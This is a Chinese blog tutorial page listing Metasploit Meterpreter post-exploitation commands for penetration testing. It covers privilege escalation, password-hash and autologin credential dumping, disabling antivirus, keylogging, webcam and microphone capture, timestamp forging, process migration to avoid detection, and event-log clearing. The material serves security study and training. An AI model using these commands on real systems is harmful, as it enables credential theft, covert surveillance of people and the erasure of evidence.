搜索
查看
编辑修改
首页
UNITY
NODEJS
PYTHON
AI
GIT
PHP
GO
CEF3
JAVA
HTML
CSS
搜索
菜鸟追梦旅行
这个屌丝很懒,什么也没留下!
关注作者
热门标签
jquery
HTML
CSS
PHP
ASP
PYTHON
GO
AI
C
C++
C#
PHOTOSHOP
UNITY
iOS
android
vue
xml
爬虫
SEO
LINUX
WINDOWS
JAVA
MFC
CEF3
CAD
NODEJS
GIT
Pyppeteer
article
热门文章
1
leetcode 每日一题复盘(线性dp)
2
RabbitMQ入门(一)——RabbitMQ的安装以及使用(Windows环境下)_mq的搭建以及使用
3
Unity UGUI的Text(文本)组件的介绍及使用_unity3d uitext显示
4
微信小程序 布局对齐属性_微信小程序图片靠右对齐
5
【NLP】关键词提取:TFIDF、TextRank_tfidf textrank
6
jenkins+ant+svn持续集成环境搭建_ant jekins svn
7
MySQL的图形用户界面(GUI)工具及其编程实现_mysql自带的gui
8
uniapp创建vue3项目_uniapp vue3
9
Excel学习记录之分类汇总与合并计算_分类汇总和合并计算
10
【Arduino+ESP32专题】PlatformIO IDE使用第三方库_platformio第三方库添加依赖
当前位置:
article
> 正文
12、后渗透测试--meterpreter使用_后渗透测试命令
作者:菜鸟追梦旅行 | 2024-04-20 09:54:34
赞
踩
后渗透测试命令
Post后渗透模块
:
在meterpreter > 中我们可以使用以下的命令来实现对目标的操作。
一、基本系统命令
sessions
# sessions –h 查看帮助
sessions -i <ID值>
# 进入会话 -k 杀死会话
background
# 将当前会话放置后台
info
# 查看已有模块信息
getuid
#
查看获取的当前权限
getsystem
#
提权
getpid
# 获取当前进程的pid
sysinfo
# 查看目标机系统信息
ps
# 查看当前活跃进程 kill <PID值> 杀死进程
idletime
#
查看目标机运行时间
hashdump
# 从SAM数据库
导出密码的哈希
reboot / shutdown
# 重启/关机
shell
# 进入目标机cmd shell
load kiwi
#
加载wiki模块
run
#
使用扩展库,
执行已有的模块,输入run后按两下tab,列出已有的脚本
run killav
#
关闭杀毒软件
run scraper
#
查看目标主机详细信息
二
、execute执行文件
execute 参数
-
f 可执行文件
#
执行可执行程序
execute -H -i -f cmd.exe
# 创建新进程cmd.exe,-H不可见,-i交互
三、目录/文件操作
pwd / getwd
#
目标机器上当前目录
(windows)
cd
# 目标机器上切换目录
ls
#
目标机器上
显示
dir
#
目标机器上
查看
mkdir dir1 dir2
mv oldfile newfile
rmdir dir1
getlwd / lpwd
#
查看攻击机当前目录
(Linux)
lls
# 在
攻击机显示
lcd
# 在
攻击机上切换目录
cat C:\\Users\\zq\\Desktop\\123.txt
#
目标机器上
读取内容
edit C:\\Users\\zq\\Desktop\\123.txt
# 篡改目标机器上的文件
search
-
f
*.
jsp
-
d e
:
\
#
搜索
E
盘中所有以
.jsp
为后缀的文件
upload msfdb /root/Desktop/Kage.0.1.1-beta_linux.AppImage C:\\Users\\zq\\Desktop
#
将两个文件
传到目标机的桌面
download C:\\Users\\zq\\Desktop\\123.txt
/
root
#
将目标机的
e:\test.txt
文件下载到
/root
目录
下
四、timestomp伪造时间戳
timestomp C:// -h
# 查看帮助
timestomp -v C://2.txt
# 查看时间戳
timestomp C://2.txt -f C://1.txt
# 将1.txt的时间戳复制给2.txt
五、进程
ps
#
查看目标主机活跃进程信息
getpid
#
查看当前
Meterpreter Shell
的进程
migrate
1732
#
将当前
Meterpreter Shell
的进程迁移到
PID
为
1732
的进程上,这样不容器被发现
kill <pid值>
# 杀死进程
六、网络
arp
# 显示目标机器arp缓存
getproxy
# 显示目标机器的代理
ifconfig
netstat -ano
route
portfwd
# 端口重定向
portfwd add -l 3389 -p 3389 -r 172.16.0.100
# 将目标机的3389端口转发到本地3389端口
然后使用rdesktop ip远程登录:
七、autoroute添加路由
run autoroute –h
# 查看帮助
run autoroute -s 192.168.159.0/24
# 添加到目标环境网络
run autoroute –p
# 查看添加的路由
然后可以利用arp_scanner、portscan等进行扫描
run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389
八、uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]
# 开启或禁止键盘/鼠标
uictl disable mouse
# 禁用鼠标
uictl disable keyboard
# 禁用键盘
九、用户接口命令(键盘嗅探,鼠标、屏幕、音频、摄像头
)
4-18 Meterpreter用户接口命令1_哔哩哔哩_bilibili
4-19 Meterpreter用户接口命令2_哔哩哔哩_bilibili
4-20 Meterpreter用户接口命令3_哔哩哔哩_bilibili
keyscan_start
#
开启键盘记录功能
在靶机上用键盘输入内容
keyscan_dump
#
显示捕捉到的键盘记录信息
keyscan_stop
#
停止键盘记录功能
鼠标:
screenshare
# 屏幕共享
保存在/usr/share/metasploit-framework/uDRIzzpV.html,可以直接浏览器打开。
screenshot
#
截图
record_mic
# 音频
play
# 播放音频
webcam_list
#
查看目标主机的摄像头
webcam_snap
# 目标主机摄像头
拍照
webcam_stream
# 目标主机通过摄像头
开视频
webcam_chat -h
#
开始与目标进行视频对话。
十、clearav清除日志
clearev
#
清除windows中的应用程序日志、系统日志、安全日志
十一、信息搜集脚本
run post
/
windows
/
manage
/
migrate
#
自动进程迁移
run post
/
windows
/
gather
/
checkvm
#
查看目标主机是否运行在虚拟机上
run post/linux/gather/checkvm
# 是否虚拟机
run post
/
windows
/
manage
/
killav
#
关闭杀毒软件
run post
/
windows
/
manage
/
enable_rdp
#
开启远程桌面服务
run post
/
windows
/
manage
/
autoroute
#
查看路由信息
run post/windows/gather/dumplinks
#获取最近的文件操作
run post
/
windows
/
gather
/
enum_logged_on_users
#
列举当前登录的用户
run post
/
windows
/
gather
/
enum_applications
#
列举应用程序
run windows
/
gather
/
credentials
/
windows_autologin
#
抓取自动登录的用户名和密码
run windows
/
gather
/
smart_hashdump
#dump
出所有用户的
hash
声明:
本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:
https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/456722
推荐阅读
article
HA
(
高
可用
)
集群
详解...
HA
集群
的架构图3.1
HA
集群
架构1) 共享信息层 在基础架构上实现心跳信息探测。双方节点可以随时探测到对方的心跳信息...
赞
踩
article
强化
学习
入门-
Pybullent
简介
、
安装
与
测试运行
_
pybullet
强化
学习
...
PyBullet 基于著名的开源物理引擎 bullet 开发,封装成了 Python 的一个模块,用于机器人仿真和
学习
。...
赞
踩
article
STM32
—
DMA
直接
存储器
访问详解...
DMA
和我们之前学过的串口、GPIO都是类似的,都是
STM32
中的一个外设。串口是用来发送通信数据的,而
DMA
则是用来把...
赞
踩
article
Elasticsearch集群连载-es集群安装_
received
plaintext
traffi...
一、准备安装包下载地址:https://www.elastic.co/cn/downloads/elasticsearc...
赞
踩
article
经典
的
Python
爬虫
和
网络
编程面试题...
1、动态加载又对及时性要求很高怎么处理?Selenium+Phantomjs尽量不使用 sleep 而使用 WebDri...
赞
踩
article
51
之
51
单片机
RAM
数据
存储
区学习笔记_
51
系列
单片机
片内ram有指针吗...
51
之
51
单片机
RAM
数据
存储
区学习笔记转自:http://www.eeworld.com.cn/mcu/2014/08...
赞
踩
article
纯干货之
阿里
云
云
计算
认证
,赶紧收藏!_
阿里
云
认证
和
cka
认证
...
阿里
云
作为占领国内
云
计算
市场份额第一的企业,有很多中小型企业也都在用
阿里
云
的产品,这就导致市面上急需要会使用
阿里
云
产品的...
赞
踩
article
【
计算机网络
】
http
协议
的原理与应用,
http
s是如何保证
安全
传输
的_
http
安全
技术...
超文本
传输
协议
(英文:HyperText Transfer Protocol,缩写:HTTP)是一种用于分布式、协作式和...
赞
踩
article
php
gd
support
not
found
.,替
php
添加
GD
库的支持...
1.安装zlib,一般Centos系统自带已经安装好,可以用以下命令去查看:[root@Test-Web2 ~]# rp...
赞
踩
article
STM32
与
ZigBee
技术在
智能家居
无线通信
中的应用研究_
传感器
采集到的数据先到
stm32
处理器还...
在
智能家居
系统中,
ZigBee
技术可以实现设备之间的互联互通,支持多种
传感器
数据的采集和控制指令的传输,具有良好的稳定性...
赞
踩
article
Elasticsearch Nested
类型
_
opensearch
索引
nested
字段...
ES数据库对于嵌套
类型
的创建和查询前言一、嵌套
类型
是什么二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么...
赞
踩
article
rabbitmq
添加
用户,
虚拟机
步,设置
rabbitmq
配置文件
...
rabbitmq
修改
配置文件
_mq
添加
用户mq
添加
用户 第一步,...
赞
踩
article
MAC缓解
WebUI
提示词反推_
wd
-v1-4-
moat
-
tagger
-v2.
onnx
...
安装完成后,可以在这个位置使用,这里是给了一个图片来反推提示词。这个错误是访问huggingface被拦截,需要科学上网...
赞
踩
article
git
从
拉
取
代码
到
更新
提交
代码
全流程_
git
拉
更新
...
这样的项目就下载下来了 然后你没有登录过会弹出一个登录账号的弹框如果你登录了,第三步:将第一步复制的地址粘贴到终端上,然...
赞
踩
article
代码
质量与
自动化
:
ESLint
&
Prettier
配置
与使用...
代码
质量与
自动化
:
ESLint
&
Prettier
配置
与使用
代码
质量与
自动化
:
ESLint
&
Prettier
配置
与...
赞
踩
article
Spring
Boot
Jar
部署:处理BOOT-INF/lib/
byte
-bud编程异常_fail...
总结起来,当在
Spring
Boot
Jar
部署过程中遇到"Failed to
get
nested
archive
f...
赞
踩
article
python3
简单
爬虫
_
爬虫
使用
-
简单
(
python3
入门)...
爬虫
是什么?- 每个网站都有
爬虫
协议,(例如:https://www.baidu.com/robots.txt,这里会写...
赞
踩
article
spring
boot
动态
数据源
切换
+通用
mapper
配置_动态
切换
数据源
还需要再
mapper
层切...
最近因为项目可能要用到多
数据源
,所以最近研究了下动态
切换
数据源
,在
spring
2.0以后增加了AbstractRouti...
赞
踩
article
5.39 综合案例2.0 -
STM32
蓝牙
遥控
小车
2(
语音
控制
)_天问
语音
控制
模块
如何
控制
蓝牙
模块
...
用
STM32
单片机做了一辆
蓝牙
控制
的麦轮
小车
,分享一下
小车
的原理和制作过程。
控制
部分分为手机APP,
语音
模块
控制
,Haa...
赞
踩
article
[
C++
]
哈希
应用之位
图
&
布隆
过滤器
...
我们之前学习了
哈希
表,
哈希
表通过映射关系,实现了O(1)的复杂度来查找数据,
哈希
在实践中是一个非常重要的思想,今天要学习...
赞
踩
相关标签
python
pygame
人工智能
深度学习
stm32
嵌入式硬件
单片机
linux
elasticsearch
大数据
列表
sqlite
lamp
scipy
zk
云计算
阿里云
http
计算机网络
https
网络安全
php gd support not found.
智能家居
es